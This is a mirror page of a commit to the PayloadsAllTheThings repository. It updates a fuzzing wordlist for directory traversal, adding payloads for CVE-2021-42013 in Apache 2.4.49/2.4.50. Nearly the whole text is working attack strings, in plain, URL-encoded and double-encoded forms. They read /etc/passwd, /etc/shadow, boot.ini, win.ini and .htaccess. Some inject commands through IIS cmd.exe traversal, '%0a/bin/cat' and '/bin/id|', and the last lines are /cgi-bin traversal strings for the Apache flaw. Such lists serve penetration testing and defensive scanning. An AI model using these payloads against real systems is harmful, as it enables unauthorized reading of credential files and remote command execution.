mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 23:32:45 +00:00
7e737baa23
Update the intruder wordlist to include CVE-2021-42013 (Traversal/RCE in Apache 2.4.49/2.4.50). Also add some depth to the current fuzzing payloads so as not to miss /cgi-bin directories that are located deeper than 4 subdirectories.
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd